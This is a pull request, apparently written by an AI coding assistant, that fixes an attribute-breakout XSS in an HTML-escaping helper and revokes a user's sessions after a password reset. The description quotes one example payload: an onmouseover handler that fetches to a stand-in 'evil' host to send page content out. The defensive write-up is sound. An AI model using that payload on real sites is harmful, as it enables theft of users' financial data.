### PR TITLE
fix(security): attribute-injection XSS + session revocation on password reset

### DIFF
--- a/db/queries.js
+++ b/db/queries.js
@@ -1377,6 +1377,18 @@ async function deleteUserBudget(userId, categorySlug) {
     return rowCount > 0;
 }
 
+async function deleteSessionsByUserId(userId) {
+    // Revoke all server-side sessions for a user — e.g. after a password
+    // reset — so a stolen or still-active session cookie stops working.
+    // connect-pg-simple stores the logged-in user under sess->'user', with
+    // the id as a JSON value, so compare it as text.
+    const { rowCount } = await pool.query(
+        `DELETE FROM "session" WHERE sess->'user'->>'id' = $1`,
+        [String(userId)]
+    );
+    return rowCount;
+}
+
 module.exports = {
     // Users
     findUserByUsername,
@@ -1391,6 +1403,7 @@ module.exports = {
     getActiveAdminCount,
     getAdminCount,
     registerWithInviteCode,
+    deleteSessionsByUserId,
 
     // Entries
     getEntriesByUser,

--- a/js/app.js
+++ b/js/app.js
@@ -2234,11 +2234,14 @@ processBulkPdfBtn.addEventListener('click', async () => {
     }
 });
 
-// Helper function to escape HTML to prevent XSS
+// Helper function to escape HTML to prevent XSS.
+// textContent -> innerHTML escapes & < > but NOT quotes; we escape " and '
+// as well so values interpolated into HTML *attribute* contexts (e.g.
+// value="..." / aria-label="...") cannot break out of the attribute.
 function escapeHtml(text) {
     const div = document.createElement('div');
     div.textContent = text;
-    return div.innerHTML;
+    return div.innerHTML.replace(/"/g, '&quot;').replace(/'/g, '&#39;');
 }
 
 // Helper function to validate month format (YYYY-MM)

--- a/js/chat.js
+++ b/js/chat.js
@@ -336,7 +336,16 @@
     }
 
     function escapeHtml(str) {
-        return String(str).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
+        // Kept in sync with app.js escapeHtml: quotes are escaped too, so a
+        // future attribute-context callsite here can't reintroduce the
+        // attribute-breakout XSS this PR hardened app.js against. Current
+        // callsites are all element-text context.
+        return String(str)
+            .replace(/&/g, '&amp;')
+            .replace(/</g, '&lt;')
+            .replace(/>/g, '&gt;')
+            .replace(/"/g, '&quot;')
+            .replace(/'/g, '&#39;');
     }
 
     function formatFieldValue(key, value) {

--- a/server.js
+++ b/server.js
@@ -1424,7 +1424,10 @@ app.post('/api/reset-password', loginLimiter, asyncHandler(async (req, res) => {
         // the password is already changed, so a cleanup failure here must not
         // turn a successful reset into an error.
         try {
-            await db.deleteSessionsByUserId(user.id);
+            const revoked = await db.deleteSessionsByUserId(user.id);
+            // Forensics breadcrumb: >0 means live sessions existed at reset
+            // time (possibly the attacker's, if the reset was remediation).
+            console.log(`Password reset for user ${user.id}: revoked ${revoked} session(s)`);
         } catch (revokeErr) {
             console.error('Failed to revoke sessions after password reset:', revokeErr.message);
         }

--- a/server.js
+++ b/server.js
@@ -1418,6 +1418,17 @@ app.post('/api/reset-password', loginLimiter, asyncHandler(async (req, res) => {
             updatedAt: new Date().toISOString()
         });
 
+        // Revoke any existing sessions so a stolen/active session cookie
+        // cannot outlive the password change — resetting the password is the
+        // remediation a compromised user is told to perform. Best-effort:
+        // the password is already changed, so a cleanup failure here must not
+        // turn a successful reset into an error.
+        try {
+            await db.deleteSessionsByUserId(user.id);
+        } catch (revokeErr) {
+            console.error('Failed to revoke sessions after password reset:', revokeErr.message);
+        }
+
         // Clear brute-force lockouts since user proved identity via email
         resetFailedLogins(username);
         clearResetAttempts(username);


### PR DESCRIPTION
Two medium-severity fixes surfaced by a full-codebase security audit. No schema or API surface changes.

## 1. Attribute-injection XSS in the bulk PDF-import preview

**Files:** `js/app.js` (`escapeHtml`, `renderBulkPreviewTable`)

`escapeHtml()` used `textContent` → `innerHTML`, which escapes `&`, `<`, `>` but **not** quote characters. The AI-extracted entry `description` from `/api/process-pdf` is returned verbatim and interpolated into double-quoted HTML attribute contexts in `renderBulkPreviewTable` — `value="${escapedDescription}"` and `aria-label="Edit entry: ${escapedDescription}"`. A description containing a `"` breaks out of the attribute; since `>` is escaped an attacker can't open a new tag, but they can add an event-handler attribute (e.g. `onmouseover=`).

**Exploit path:** an attacker crafts a bank-statement PDF whose extracted description is e.g. `Coffee" onmouseover="fetch('https://evil/?d='+document.body.innerText) x="`. A user imports that PDF (normal for a statement received from a third party); when they hover the row's Edit/Delete button, script runs in their authenticated origin. Cookies are `httpOnly`, but the CSRF token is readable by JS, so the payload can act as the user and exfiltrate financial data.

**Fix:** `escapeHtml` now also escapes `"` → `&quot;` and `'` → `&#39;`, closing the sink everywhere the helper is used (verified: the payload's quotes become entities, so the value stays inside its attribute).

## 2. Password reset did not revoke existing sessions

**Files:** `server.js` (`POST /api/reset-password`), `db/queries.js` (new `deleteSessionsByUserId`)

`reset-password` updated only `passwordHash`, and sessions are validated by user id + `isActive` alone (no password-version binding). So if an attacker rode a stolen session cookie and the victim responded by resetting their password — the exact remediation for a compromised account — the attacker's session kept working until its 24h expiry.

**Fix:** added `db.deleteSessionsByUserId(userId)` (deletes the user's rows from the connect-pg-simple `session` table via `sess->'user'->>'id'`) and call it best-effort after the password update, so all of the user's server-side sessions are invalidated. Best-effort because the password is already changed at that point — a cleanup failure must not turn a successful reset into an error (it's logged instead).

## Testing

- `node --check` passes on all three files.
- XSS fix verified against the sample payload — injected quotes are neutralized to `&quot;`, no attribute breakout.
- Manual: reset a password while logged in on a second device; the second session's next request should 401. Import a PDF whose description contains a `"` and confirm the preview renders it literally (no attribute breakout).

## Audit notes (not in this PR)

The wider audit found the codebase otherwise well-secured — SQL fully parameterized, no IDOR, AI tools server-scoped + two-phase confirmed, payments validated server-side, no committed secrets, `npm audit` clean. Remaining items are all low severity (username-based login lockout DoS, register username enumeration, email change lacks step-up re-auth, CSP `unsafe-inline`, AES-CBC without MAC — not exploitable) and are left for a follow-up.

🤖 Generated with [Claude Code](https://claude.com/claude-code)